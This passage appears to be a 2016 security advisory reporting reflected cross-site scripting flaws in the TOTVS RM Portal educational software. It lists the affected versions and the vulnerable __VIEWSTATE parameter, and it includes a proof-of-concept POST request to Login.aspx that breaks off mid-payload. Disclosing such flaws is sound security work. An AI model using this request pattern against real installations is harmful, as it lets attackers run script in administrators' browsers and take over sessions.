TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities Product web page: www.totvs.com.br Author: vesp3r Email: vesp3r7c3@gmail.com Published: 13/02/2016 [Vendor Product Description] TOTVS (pronounced Totus) is a Brazilian software company, with headquarters in Sao Paulo. TOTVS was initially formed from the merger of Microsiga and Logocenter companies. It is the largest software company in Latin America. TOTVS is the leader in the Brazilian ERP market and according to the FGV, besides Brazil, with offices in Argentina, Mexico and the United States. [Advisory Timeline] 1- 22/Dec/2015 (No vendor response) 2- 05/Feb/2016 (No vendor response) Tested on: 11.40.80.x 11.52.50.x 11.52.63.x 11.52.64.x 11.82.41.1 11.82.37.0 11.82.41.112 11.82.42.1 12.1.6.108 12.1.6.117 12.1.7.100 12.1.7.110 12.1.7.120 12.1.8.0 12.1.8.1 [Vulnerability Details] Attacker could take advantage of reflective XSS by using unprotected __VIEWSTATE and __EVENTVALIDATION parameters, passed to various scripts. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary javascript code in browser in context of the vulnerable website. 1) Reflected Cross-site Scripting - Login.aspx Parameter: __VIEWSTATE POST /corpore.net/Login.aspx HTTP/1.1 [Snip...] Content-Length:599 Expect:100-continue Connection:Keep-Alive __VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92